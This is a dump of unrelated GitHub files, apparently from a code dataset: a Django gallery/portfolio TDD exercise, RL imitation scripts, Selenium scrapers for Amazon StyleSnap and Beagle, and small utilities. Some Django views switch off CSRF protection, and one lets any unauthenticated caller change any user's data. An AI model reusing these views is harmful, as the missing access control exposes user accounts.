\"\"\"Given a sentence, this clas is used to apply some preprocessing functions before going to further steps.\"\"\"\n\n\n def __init__(self):\n pass\n\n @staticmethod\n def decontract(sentence):\n sentence = re.sub(r\"won\\'t\", \"will not\", sentence)\n sentence = re.sub(r\"can\\'t\", \"can not\", sentence)\n\n # general\n sentence = re.sub(r\"n\\'t\", \" not\", sentence)\n sentence = re.sub(r\"\\'re\", \" are\", sentence)\n sentence = re.sub(r\"\\'s\", \" is\", sentence)\n sentence = re.sub(r\"\\'d\", \" would\", sentence)\n sentence = re.sub(r\"\\'ll\", \" will\", sentence)\n sentence = re.sub(r\"\\'t\", \" not\", sentence)\n sentence = re.sub(r\"\\'ve\", \" have\", sentence)\n sentence = re.sub(r\"\\'m\", \" am\", sentence)\n return sentence\n\n\n @staticmethod\n def remove_punct(sentence):\n remove = string.punctuation\n remove = remove.replace(\"$\", \"\") # don't remove hyphens\n remove = remove.replace(\"&\", \"\") # don't remove hyphens\n remove = remove.replace(\"%\", \"\") # don't remove hyphens\n\n pattern = r\"[{}]\".format(remove) # create the pattern\n\n sentence = re.sub(pattern, \"\", sentence) \n return sentence\n\n @staticmethod\n def remove_whitespace(sentence):\n return sentence.strip()\n \n @staticmethod\n def prepro(sentence):\n sentence=preprocess_text.decontract(sentence)\n sentence=preprocess_text.remove_punct(sentence)\n sentence=preprocess_text.remove_whitespace(sentence)\n\n return sentence\n" }, { "alpha_fraction": 0.7473053932189941, "alphanum_fraction": 0.7700598835945129, "avg_line_length": 38.71428680419922, "blob_id": "9b7c67b6e4e0b0801d94394f2431bdfcfa15424a", "content_id": "8c0cbac0d7db395e62e0ae6fbb49ab96510a7290", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 841, "license_type": "permissive", "max_line_length": 113, "num_lines": 21, "path": "/example.py", "repo_name": "Utkarshupd/speak2write", "src_encoding": "UTF-8", "text": "from spoken2writ import currency,text2int,preprocess_text\n\n\nspoken_text = \"\"\" Hey, did you know that - the summer break is coming? Amazing right!! It’s only 5 more days!!\"\"\"\n\n\n# The preprocess_text module will perform various functions like removing whitespaces,decontracting etc.\nprint(preprocess_text().prepro(spoken_text))\n#Output will be: “Hey did you know that the summer break is coming Amazing right Its only 5 more days”\n\n# The text2int module will convert any spoken number into its numerical form.\nspoken_text = \"\"\"seven billion one hundred million thirty one thousand three hundred thirty seven \"\"\"\n\nprint(text2int().text2num(spoken_text))\n#Output will be: 7100031337\n\n#The currency modelu will convert currency dollar to its numerical form.\nspoken_text = '5'\nprint(currency().tocurrency(spoken_text))\n\n#Output will be: $5\n\n" } ]
4
mateodevia/TDD-kata2
https://github.com/mateodevia/TDD-kata2
d885329fd1e7290c96051a427f46c94c0e3e9cdb
35c55391dab5fac9eb985365e974633672036729
f0e8d088f98710f4d1ff3d33f484d46dd0b2d495
refs/heads/master
2021-04-23T18:33:24.157690
2020-03-29T17:49:43
2020-03-29T17:49:43
249,967,927
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6933462023735046, "alphanum_fraction": 0.6933462023735046, "avg_line_length": 33.56666564941406, "blob_id": "ba2353178a65a8620016b4831a9de7781c7dc06b", "content_id": "d716c5207b28bba9f49304d2944aa5a4155a5331", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1037, "license_type": "no_license", "max_line_length": 85, "num_lines": 30, "path": "/galleryTddProject/gallery/views.py", "repo_name": "mateodevia/TDD-kata2", "src_encoding": "UTF-8", "text": "from django.contrib.auth.models import User\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.core import serializers\nfrom .models import Image\nimport json\n\n# Create your views here.\n@csrf_exempt\ndef index(request):\n images_list = Image.objects.all()\n return HttpResponse(serializers.serialize(\"json\", images_list))\n\n@csrf_exempt\ndef add_user_view(request):\n if request.method == 'POST':\n json_user = json.loads(request.body)\n username = json_user['username']\n first_name = json_user['first_name']\n last_name = json_user['last_name']\n password = json_user['password']\n email = json_user['email']\n\n user_model = User.objects.create_user(username=username, password=password)\n user_model.first_name = first_name\n user_model.last_name = last_name\n user_model.email = email\n user_model.save()\n return HttpResponse(serializers.serialize(\"json\", [user_model]))\n" }, { "alpha_fraction": 0.8240000009536743, "alphanum_fraction": 0.8240000009536743, "avg_line_length": 30.25, "blob_id": "c23bcb0eb9144e72f197f1c7188880ac6518571c", "content_id": "e0385ec77e81a1a014f9cf0ec9fcaf6b84cc7cd5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 125, "license_type": "no_license", "max_line_length": 32, "num_lines": 4, "path": "/galleryTddProject/portafolio/admin.py", "repo_name": "mateodevia/TDD-kata2", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import Portafolio\n# Register your models here.\nadmin.site.register(Portafolio)\n" }, { "alpha_fraction": 0.7019591331481934, "alphanum_fraction": 0.7044602036476135, "avg_line_length": 35.318180084228516, "blob_id": "1244dbfc6be176935732d95e9e55aef6d086d239", "content_id": "fcd27748714e64021c1c8e2d5be669c86e1dec2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2399, "license_type": "no_license", "max_line_length": 116, "num_lines": 66, "path": "/galleryTddProject/portafolio/views.py", "repo_name": "mateodevia/TDD-kata2", "src_encoding": "UTF-8", "text": "from django.contrib.auth.management import get_default_username\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.core import serializers\nfrom rest_framework.decorators import api_view\n\nfrom .models import Portafolio\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login\nimport json\n\n# Create your views here.\n@csrf_exempt\ndef index(request):\n portafolios_list = Portafolio.objects.all()\n return HttpResponse(serializers.serialize(\"json\", portafolios_list))\n\n\n@csrf_exempt\ndef add_user_view(request):\n if request.method == 'POST':\n json_user = json.loads(request.body)\n username = json_user['username']\n first_name = json_user['first_name']\n last_name = json_user['last_name']\n password = json_user['password']\n email = json_user['email']\n\n user_model = User.objects.create_user(\n username=username, password=password)\n user_model.first_name = first_name\n user_model.last_name = last_name\n user_model.email = email\n user_model.save()\n return HttpResponse(serializers.serialize(\"json\", [user_model]))\n\n\ndef get_portafolios_publicos(request, username):\n usuario = User.objects.get(username=username)\n print(usuario)\n portafolios_list = Portafolio.objects.filter(user=usuario, public=True)\n return HttpResponse(serializers.serialize(\"json\", portafolios_list))\n\n\n@csrf_exempt\ndef iniciar_sesion(request):\n json_user = json.loads(request.body)\n username = json_user['username']\n password = json_user['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n # Redirect to a success page.\n return HttpResponse(status=200)\n else:\n # Return an 'invalid login' error message.\n return HttpResponse(status=400)\n\n@api_view(['PUT'])\n@csrf_exempt\ndef actualizar_usuario(request):\n if request.method == 'PUT':\n datos_usuario= json.loads(request.body)\n user = User.objects.filter(username= datos_usuario['username']).update(last_name=datos_usuario['last_name'])\n obj = User.objects.filter(username=datos_usuario['username']).first()\n return HttpResponse(serializers.serialize(\"json\", [obj]), content_type='application/json')\n\n\n" }, { "alpha_fraction": 0.6356960535049438, "alphanum_fraction": 0.6414431929588318, "avg_line_length": 50.31147384643555, "blob_id": "fd1cbf425ecc54dc6ad41ebd09f087482e0fdb4f", "content_id": "a0384f75b1459d21bdc56dc74ae484fa4fa2a821", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3132, "license_type": "no_license", "max_line_length": 186, "num_lines": 61, "path": "/galleryTddProject/portafolio/tests.py", "repo_name": "mateodevia/TDD-kata2", "src_encoding": "UTF-8", "text": "\nfrom django.contrib.auth.models import User\nfrom django.test import TestCase, Client\n\n# Create your tests here.\nfrom .models import Portafolio\nimport json\n\n# Create your tests here.\n\n\nclass PortafolioTestCase(TestCase):\n\n def test_list_portafolios_status(self):\n url = '/portafolios/'\n response = self.client.get(url, Format='json')\n self.assertEqual(response.status_code, 200)\n\n def test_count_portafolios_list(self):\n user_model = User.objects.create_user(\n username='test', password='kd8wke-DE34', first_name='test', last_name='test', email='[email protected]')\n Portafolio.objects.create(user=user_model)\n Portafolio.objects.create(user=user_model)\n\n response = self.client.get('/portafolios/')\n current_data = json.loads(response.content)\n self.assertEqual(len(current_data), 2)\n\n def test_add_user(self):\n response = self.client.post('/portafolios/addUser/', json.dumps({\"username\": \"testUser\", \"first_name\": \"Test\",\n \"last_name\": \"User\", \"password\": \"AnyPas#5\", \"email\": \"[email protected]\"}), content_type='application/json')\n current_data = json.loads(response.content)\n self.assertEqual(current_data[0]['fields']['username'], 'testUser')\n\n def test_get_portafolios_publicos(self):\n user_model = User.objects.create_user(\n username='testUser', password='kd8wke-DE34', first_name='test', last_name='test', email='[email protected]')\n Portafolio.objects.create(user=user_model, public=True)\n Portafolio.objects.create(user=user_model, public=False)\n response = self.client.get('/portafolios/publicos/testUser')\n print(response)\n current_data = json.loads(response.content)\n self.assertEqual(len(current_data), 1)\n\n def test_login(self):\n user_model = User.objects.create_user(\n username='testUser', password='kd8wke-DE34', first_name='test', last_name='test', email='[email protected]')\n response = self.client.post('/portafolios/login/', json.dumps(\n {\"username\": \"testUser\", \"password\": \"kd8wke-DE34\", }), content_type='application/json')\n self.assertEqual(response.status_code, 200)\n user_model2 = User.objects.create_user(\n username='testUser2', password='kd8wXASFDke-DE34', first_name='test', last_name='test', email='[email protected]')\n response2 = self.client.post('/portafolios/login/', json.dumps(\n {\"username\": \"testUser2\", \"password\": \"kd8wke-DE34\", }), content_type='application/json')\n self.assertEqual(response2.status_code, 400)\n\n def test_editar_datos(self):\n user_model = User.objects.create_user(\n username='testUser', password='kd8wke-DE34', first_name='Sebastian', last_name='Mujica', email='[email protected]')\n response = self.client.put('/portafolios/actualizarUsuario/', json.dumps({\"username\": \"testUser\", \"password\": \"kd8wke-DE34\", \"last_name\":\"Diaz\"}), content_type='application/json')\n current_data = json.loads(response.content)\n self.assertEqual(current_data[0]['fields']['last_name'],\"Diaz\")\n\n" }, { "alpha_fraction": 0.6668432354927063, "alphanum_fraction": 0.6710805296897888, "avg_line_length": 47.43589782714844, "blob_id": "0bb09d32a609cc44b175791bd8b255f6ddb72c8d", "content_id": "8f300c4c1db93be34eaac8e549c58c27b3d44cb2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1888, "license_type": "no_license", "max_line_length": 213, "num_lines": 39, "path": "/galleryTddProject/gallery/tests.py", "repo_name": "mateodevia/TDD-kata2", "src_encoding": "UTF-8", "text": "from django.contrib.auth.models import User\nfrom django.test import TestCase, Client\n\n# Create your tests here.\nfrom .models import Image\nimport json\n\n# Create your tests here.\nclass GalleryTestCase(TestCase):\n\n def test_list_images_status(self):\n url = '/gallery/'\n response = self.client.get(url, format='json')\n self.assertEqual(response.status_code, 200)\n\n def test_count_images_list(self):\n user_model = User.objects.create_user(username='test', password='kd8wke-DE34', first_name='test', last_name='test', email='[email protected]')\n Image.objects.create(name='nuevo', url='No', description='testImage', type='jpg', user=user_model)\n Image.objects.create(name='nuevo2', url='No', description='testImage', type='jpg', user=user_model)\n\n response=self.client.get('/gallery/')\n current_data=json.loads(response.content)\n print(current_data)\n self.assertEqual(len(current_data),2)\n\n def test_verify_first_from_images_list(self):\n user_model = User.objects.create_user(username='test', password='kd8wke-DE34', first_name='test', last_name='test', email='[email protected]')\n Image.objects.create(name='nuevo', url='No', description='testImage', type='jpg', user=user_model)\n Image.objects.create(name='nuevo2', url='No', description='testImage', type='jpg', user=user_model)\n\n response=self.client.get('/gallery/')\n current_data=json.loads(response.content)\n\n self.assertEqual(current_data[0]['fields']['name'],\"nuevo\")\n\n def test_add_user(self):\n response=self.client.post('/gallery/addUser/',json.dumps({\"username\": \"testUser\", \"first_name\": \"Test\", \"last_name\": \"User\", \"password\": \"AnyPas#5\", \"email\": \"[email protected]\"}), content_type='application/json')\n current_data=json.loads(response.content)\n self.assertEqual(current_data[0]['fields']['username'],'testUser')" }, { "alpha_fraction": 0.7441860437393188, "alphanum_fraction": 0.7541528344154358, "avg_line_length": 32.11111068725586, "blob_id": "307fca02434e44018689de6e4f9acc67e3c218b3", "content_id": "867c14e6e915a03c12d63e04d28e40baf5b8f11c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 301, "license_type": "no_license", "max_line_length": 71, "num_lines": 9, "path": "/galleryTddProject/portafolio/models.py", "repo_name": "mateodevia/TDD-kata2", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\n\n\n# Create your models here.\nclass Portafolio(models.Model):\n name = models.CharField(max_length=200)\n user = models.ForeignKey(User, null=True, on_delete=models.PROTECT)\n public = models.BooleanField(default=False)\n\n\n\n" }, { "alpha_fraction": 0.7160493731498718, "alphanum_fraction": 0.7456790208816528, "avg_line_length": 39.5, "blob_id": "18c1daa2e3abce669caaf5656644dd9be4f5f7b5", "content_id": "c347ac9af4c4f23d5ea218e694c33ae42911ff7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 405, "license_type": "no_license", "max_line_length": 71, "num_lines": 10, "path": "/galleryTddProject/gallery/models.py", "repo_name": "mateodevia/TDD-kata2", "src_encoding": "UTF-8", "text": "from django.contrib.auth.models import User\nfrom django.db import models\n\n# Create your models here.\nclass Image(models.Model):\n name = models.CharField(max_length=200)\n url = models.CharField(max_length=1000)\n description = models.CharField(max_length=1000, null=True)\n type = models.CharField(max_length=5, blank=True)\n user = models.ForeignKey(User, null=True, on_delete=models.PROTECT)\n" }, { "alpha_fraction": 0.5473145842552185, "alphanum_fraction": 0.5959079265594482, "avg_line_length": 20.72222137451172, "blob_id": "602d4ba367c7a96cdd56792345e9451bbed0383b", "content_id": "6a6a64259b0a3d8d0cd2c0e10775aa3ac0526fb2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 391, "license_type": "no_license", "max_line_length": 53, "num_lines": 18, "path": "/galleryTddProject/portafolio/migrations/0003_portafolio_public.py", "repo_name": "mateodevia/TDD-kata2", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.4 on 2020-03-27 00:20\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('portafolio', '0002_portafolio_user'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='portafolio',\n name='public',\n field=models.BooleanField(default=False),\n ),\n ]\n" }, { "alpha_fraction": 0.6568047404289246, "alphanum_fraction": 0.6568047404289246, "avg_line_length": 20.125, "blob_id": "9ba8d6fd88776b5312376db948396e35ce19f920", "content_id": "b813b52a503de3e71ceb7c5a4915f3ef5f58ae75", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 169, "license_type": "no_license", "max_line_length": 58, "num_lines": 8, "path": "/galleryTddProject/gallery/urls.py", "repo_name": "mateodevia/TDD-kata2", "src_encoding": "UTF-8", "text": "from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('addUser/', views.add_user_view, name='addUser'),\n]\n" }, { "alpha_fraction": 0.6658291220664978, "alphanum_fraction": 0.6658291220664978, "avg_line_length": 25.53333282470703, "blob_id": "982656f8141591b04365b2f18ff3e09e73fc6de6", "content_id": "440cf135027e6c7d4e5f3e765b17f3206d259edc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 398, "license_type": "no_license", "max_line_length": 73, "num_lines": 15, "path": "/galleryTddProject/portafolio/urls.py", "repo_name": "mateodevia/TDD-kata2", "src_encoding": "UTF-8", "text": "from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('addUser/', views.add_user_view, name='addUser'),\n path('publicos/<slug:username>',\n views.get_portafolios_publicos, name='publicos'),\n path('login/', views.iniciar_sesion, name='login'),\n path('actualizarUsuario/', views.actualizar_usuario, name='editUser')\n\n\n\n]\n" } ]
10
Sidd0602/hello-world
https://github.com/Sidd0602/hello-world
407ff77a57cfa81bb25b15261d768f5bc38cd724
ca5fde3aedc057a6e86a8bbf1a76a59781539d8c
8d11c6bf67a0ee13ac77d651a87ee29f4a675c42
refs/heads/master
2021-12-24T03:40:51.934165
2021-10-13T12:53:11
2021-10-13T12:53:11
82,387,855
0
0
null
2017-02-18T13:15:27
2021-10-05T18:22:20
2021-10-06T12:55:58
Python
[ { "alpha_fraction": 0.6424474120140076, "alphanum_fraction": 0.6489483714103699, "avg_line_length": 35.31944274902344, "blob_id": "04ebe833b94865e55b259ab5263f4bb6bfa9623f", "content_id": "e385adff820aa6ef97d623abc3f2a6b69488f2ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2615, "license_type": "no_license", "max_line_length": 164, "num_lines": 72, "path": "/Python/AMZ-Scraper.py", "repo_name": "Sidd0602/hello-world", "src_encoding": "UTF-8", "text": "!pip install selenium #install selenium if not already present\n\n# Amazon StyleSnap Automated Scraping\n\n# Import useful functions\nimport time \nimport urllib.request\n\n# Import selenium related functions\nfrom selenium import webdriver \nfrom selenium.webdriver.common.keys import Keys \nfrom selenium.webdriver.common.action_chains import ActionChains\n\n\nlogfile = \"scraper-log.txt\"\nlog_writer = open(logfile, \"a\") \n# Creating an instance webdriver\nbrowser = webdriver.Chrome(executable_path=r'chromedriver.exe') #add the webdriver here\nbrowser.maximize_window()\nbrowser.get(\"https://www.amazon.in/stylesnap\")\n\ndef scrape_data(input_img):\n # collect the data--\n button_group = browser.find_elements_by_class_name(\"bbx-dot\")\n for button in button_group:\n gender = \"\"\n actions = ActionChains(browser)\n url_list = []\n button.click()\n for _ in range(10):\n actions.send_keys(Keys.SPACE).perform()\n time.sleep(1)\n try: # identify the gender\n gender_filter = browser.find_element_by_xpath(\"/html/body/div[1]/div[2]/div/div/div[3]/div/div[1]/div[2]/div[1]/div[2]/div/ul/li[1]/div/label/span[2]\").text\n gender = \"Female\"\n except:\n gender = \"Male\"\n\n product_lists = browser.find_elements_by_class_name(\"cellContainer\")\n print(\"Input-file,\" + input_img + \",recommended-gender,\" + gender + \",total-recommendations,\" + str(len(product_lists)))\n log_writer.write(\"Input-file,\" + input_img + \",recommended-gender,\" + gender + \",total-recommendations,\" + str(len(product_lists)) + \"\\n\")\n iter_count = 1\n\n for product in product_lists:\n try:\n product_tag = product.find_element_by_tag_name('a')\n product_link = product_tag.get_property('href')\n image_tag = product.find_element_by_tag_name('img')\n image_path = image_tag.get_attribute('src')\n urllib.request.urlretrieve(image_path, download_folder + input_img + \"-RECO-\" + str(iter_count) + \".jpg\")\n url_list.append(product_link)\n iter_count += 1\n except:\n continue\n with open(download_folder + input_img + \"-reco-list.txt\", 'w') as f:\n for item in url_list:\n f.write(\"%s\\n\" % item)\n \n\niter_items = [] # list to maintain items to iterate over\n\nfor image_id in iter_items:\n time.sleep(3)\n browser.find_element_by_id(\"file\").send_keys(\"item_path_\" + str(image_id))\n time.sleep(5)\n scrape_data(\"item_path_\" + str(image_id))\n time.sleep(2)\n browser.get(\"https://www.amazon.in/stylesnap\")\n \nlog_writer.close()\nbrowser.close()\nbrowser.quit()\n" }, { "alpha_fraction": 0.6058931946754456, "alphanum_fraction": 0.6187845468521118, "avg_line_length": 20.719999313354492, "blob_id": "e25e82d1be8d17447797a1d09d849a7dadaa13ed", "content_id": "16b5d3405e39497e7ca5a2b46189632011af9e81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1086, "license_type": "no_license", "max_line_length": 50, "num_lines": 50, "path": "/Python/stats.py", "repo_name": "Sidd0602/hello-world", "src_encoding": "UTF-8", "text": "# male vs female\nimport numpy as np\nimport pandas as pd\nfrom scipy import stats\nfrom statistics import multimode\n\ninput_file = input()\ndf = pd.read_csv(input_file)\nresults = df.iloc[:,:]\nresults\n\ndef get_mode(gender_series):\n numpy_array = gender_series.to_numpy()\n print(','.join(multimode(numpy_array)))\n\ncount = 0\nfor j in range(5,215,2):\n get_mode(results.iloc[:,j])\n \n\nfrom itertools import islice\nfrom scipy.stats import kendalltau\nfrom scipy.stats import spearmanr\nfrom scipy.stats import pearsonr\nfilename = input()\nX = [1, 2, 3, 4, 5]\nkt_list = []\nsp_list = []\n\nwith open(filename,'r') as file:\n while True:\n next_n_lines = list(islice(file, 5))\n if not next_n_lines:\n break\n else:\n results = list(map(int, next_n_lines))\n kt_corr, _ = kendalltau(X, results)\n sp_corr, _ = spearmanr(X, results)\n sp_list.append(sp_corr)\n kt_list.append(kt_corr)\n\n\n\nprint(\"Spearman\")\nfor corr in sp_list:\n print('%.3f' % corr)\n \nprint(\"KT\")\nfor corr in kt_list:\n print('%.3f' % corr)\n" }, { "alpha_fraction": 0.7906976938247681, "alphanum_fraction": 0.7906976938247681, "avg_line_length": 56.33333206176758, "blob_id": "34d4472a62dbd250778931117f4b56a3a465e9a2", "content_id": "fc24880d22e7356fb712eada1383d42b70d117a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 172, "license_type": "no_license", "max_line_length": 80, "num_lines": 3, "path": "/README.md", "repo_name": "Sidd0602/hello-world", "src_encoding": "UTF-8", "text": "# hello-world\nThis is the first repository I'm creating on github. It just has HELLO WORLD\nThis is the first branch edit. I'm learning web development and software design.\n" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6038498282432556, "avg_line_length": 47.5514030456543, "blob_id": "8c18564f68832aa73f80f6278dc2376ddc77074f", "content_id": "f7b0fea06d811847d01b1e4632e2ec489b2352fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5195, "license_type": "no_license", "max_line_length": 152, "num_lines": 107, "path": "/Python/BGL-Scraper.py", "repo_name": "Sidd0602/hello-world", "src_encoding": "UTF-8", "text": "# Import useful functions\nimport time \nimport urllib.request\n\n# Import selenium related functions\nfrom selenium import webdriver \nfrom selenium.webdriver.common.keys import Keys \nfrom selenium.webdriver.common.action_chains import ActionChains\n\n\nlogfile = input()\nlog_writer = open(logfile, \"a\") \n\n# Creating an instance webdriver\nbrowser = webdriver.Chrome(executable_path=r'chromedriver.exe')\nbrowser.maximize_window()\nbrowser.get(\"https://beagle.vision/\")\nactions = ActionChains(browser)\n\ndownload_folder = \"/path/to/folder\"\n\ndef string_mod(button_label):\n label_array = button_label.split(\",\")\n label_array = [x.strip(' ') for x in label_array]\n label_array = [x.replace(\"-\",\"\") for x in label_array]\n final_label = '-'.join(label_array)\n return final_label\n \n\ndef scrape_data(input_img):\n button_grp = browser.find_element_by_xpath(\"/html/body/main/div/div[1]/div/div[2]/div[2]/div[2]\")\n button_children = button_grp.find_elements_by_xpath(\".//*\")\n for button in button_children:\n product_list = []\n url_list = []\n new_button_label = string_mod(button.text)\n button.click()\n time.sleep(7)\n browser.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n result_top_level_div = browser.find_element_by_id(\"vs-results\")\n result_row = result_top_level_div.find_element_by_class_name(\"row\")\n product_list = result_row.find_elements_by_class_name(\"col\") # all products recommended for this input image\n print(\"Input-file,\" + input_img + \"-\" + new_button_label + \",total-recommendations,\" + str(len(product_list)))\n log_writer.write(\"Input-file,\" + input_img + \",total-recommendations,\" + str(len(product_list)) + \"\\n\")\n iter_count = 1\n \n for product in product_list:\n try:\n product_tag = product.find_element_by_tag_name('a')\n product_img_div = product_tag.find_element_by_class_name(\"product-img-wrap\")\n product_img_div_second = product_img_div.find_element_by_class_name(\"product-img\")\n product_img_div_final = product_img_div_second.find_element_by_tag_name(\"div\")\n product_img_tag = product_img_div_final.find_element_by_tag_name('img')\n product_img_link = product_img_tag.get_attribute('src')\n urllib.request.urlretrieve(product_img_link, download_folder + input_img + \"-\" + new_button_label + \"-RECO-\" + str(iter_count) + \".jpg\")\n product_link = product_tag.get_property('href')\n url_list.append(product_link)\n iter_count += 1\n except:\n continue\n with open(download_folder + input_img + \"-\" + new_button_label + \"-reco-list.txt\", 'w') as f:\n for item in url_list:\n f.write(\"%s\\n\" % item)\n\n print(\"Input-file,\" + input_img + \",button-texts,\" + button.text)\n if (button.text.find('label') != -1): #todo: check only for those buttons which identify the clothing\n button.click()\n time.sleep(7)\n browser.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n result_top_level_div = browser.find_element_by_id(\"vs-results\")\n result_row = result_top_level_div.find_element_by_class_name(\"row\")\n product_list = result_row.find_elements_by_class_name(\"col\") # all products recommended for this input image\n \n print(\"Input-file,\" + input_img + \",total-recommendations,\" + str(len(product_list)))\n log_writer.write(\"Input-file,\" + input_img + \",total-recommendations,\" + str(len(product_list)) + \"\\n\")\n iter_count = 1\n \n for product in product_list:\n try:\n product_tag = product.find_element_by_tag_name('a')\n product_img_div = product_tag.find_element_by_class_name(\"product-img-wrap\")\n product_img_div_second = product_img_div.find_element_by_class_name(\"product-img\")\n product_img_div_final = product_img_div_second.find_element_by_tag_name(\"div\")\n product_img_tag = product_img_div_final.find_element_by_tag_name('img')\n product_img_link = product_img_tag.get_attribute('src')\n urllib.request.urlretrieve(product_img_link, download_folder + input_img + \"-RECO-\" + str(iter_count) + \".jpg\")\n product_link = product_tag.get_property('href')\n url_list.append(product_link)\n iter_count += 1\n except:\n continue\n with open(download_folder + input_img + \"-reco-list.txt\", 'w') as f:\n for item in url_list:\n f.write(\"%s\\n\" % item)\n \n\niter_items = []\nfor image_id in iter_items:\n time.sleep(3)\n browser.find_element_by_xpath(\"/html/body/main/div/div[1]/div/div[2]/form[2]/input\").send_keys(\"/path/to/file\" + str(image_id))\n time.sleep(10)\n scrape_data(\"/file/identifier\" + str(image_id))\n time.sleep(2)\n browser.get(\"https://beagle.vision/\")\n\nlog_writer.close()\nbrowser.close()\n" } ]
4
testerpce/RL_Mtech_2_off_imitation
https://github.com/testerpce/RL_Mtech_2_off_imitation
3153cacd4503403cb4f2a9209b2016076f4f9bca
60ff7bcad899d8a4830927b3d82b150fe8d8c94a
abea2b505b2f50025ada0ec0f9eb1dd48c7b7520
refs/heads/master
2020-05-23T05:42:13.948557
2019-05-22T19:36:51
2019-05-22T19:36:51
186,652,309
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4607631266117096, "alphanum_fraction": 0.4787617027759552, "avg_line_length": 34.61538314819336, "blob_id": "2a0c3248f94d9d18ec14a75c718743bca2e38394", "content_id": "87b213ff70d0a6dfd485456eb6bd8025af2a2bfc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1389, "license_type": "no_license", "max_line_length": 96, "num_lines": 39, "path": "/Test_imitator.py", "repo_name": "testerpce/RL_Mtech_2_off_imitation", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 14 12:29:46 2019\n\n@author: sayambhu\n\"\"\"\n\nfrom Imitator import Imitator\n# =============================================================================\n# import os\n# from utils_imitate import get_saved_hyperparams,create_test_env\n# =============================================================================\nprint (\"\\n Imitator imported \\n\")\n\n################################\n#Time to normalize the environment\nimport gym\nenv_id='BipedalWalker-v2'\n# =============================================================================\n# stats_path=os.path.join(os.getcwd(),env_id)\n# hyperparams, stats_path = get_saved_hyperparams(stats_path, norm_reward=False, test_mode=True)\n# algo_id='Imitator'\n# print(\"hyperparams here= \",hyperparams)\n# \n# log_dir=os.path.join(os.getcwd(),'logs',algo_id,env_id)\n# env = create_test_env(env_id,n_envs=1, is_atari=False,log_dir=log_dir,\n# stats_path=stats_path, seed=1000,\n# should_render=True,\n# hyperparams=hyperparams)\n# =============================================================================\nenv=gym.make('BipedalWalker-v2')\n\n###############################\nprint(\"\\n Gym made \\n\")\nimit=Imitator(env,max_episode_len=2000)\nprint(\"\\n Imitator made \\n\")\nimit.learn()\nprint(\"\\n imitator learn done \\n\")\n" }, { "alpha_fraction": 0.4928511381149292, "alphanum_fraction": 0.5043454170227051, "avg_line_length": 36.03191375732422, "blob_id": "44ec71c24fd96739c6721fd1da22b15a88807d76", "content_id": "73ac728ac9c4605526f52d4aafc854ad83030c5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3567, "license_type": "no_license", "max_line_length": 119, "num_lines": 94, "path": "/Replay_Buffer_np.py", "repo_name": "testerpce/RL_Mtech_2_off_imitation", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 8 16:04:49 2019\n\n@author: sayambhu\n\"\"\"\n\nfrom collections import deque\nimport random\nimport numpy as np\n\n\n\nclass ReplayBuffer(object):\n \n def __init__(self,buffer_size,state_dim,action_dim,random_seed=123):\n \"\"\"\n The right side of deque contains the most recent experiences\n \"\"\"\n print(\"Creating Replay Buffer object\")\n self.buffer_size=buffer_size\n self.state_dim=state_dim\n self.action_dim=action_dim\n self.pointer=0\n self.states=np.zeros(shape=[buffer_size,state_dim])\n self.actions=np.zeros(shape=[buffer_size,action_dim])\n self.rewards=np.zeros(shape=[buffer_size,1])\n self.dones=np.zeros(shape=[buffer_size,1])\n self.next_states=np.zeros(shape=[buffer_size,state_dim])\n self.filled=False\n \n random.seed(random_seed)\n \n def add(self,s,a,r,t,s2):\n \n self.states[self.pointer] = s\n self.actions[self.pointer] = a\n self.rewards[self.pointer] = r\n self.dones[self.pointer] = t\n self.next_states[self.pointer] = s2\n \n self.pointer +=1\n if self.pointer%self.buffer_size == 0 :\n self.filled=True\n self.pointer =self.pointer%self.buffer_size\n \n def expert_add(self,s,a,r,t,s2):\n self.states[0:self.buffer_size]=s[0:self.buffer_size]\n self.actions[0:self.buffer_size]=a[0:self.buffer_size]\n 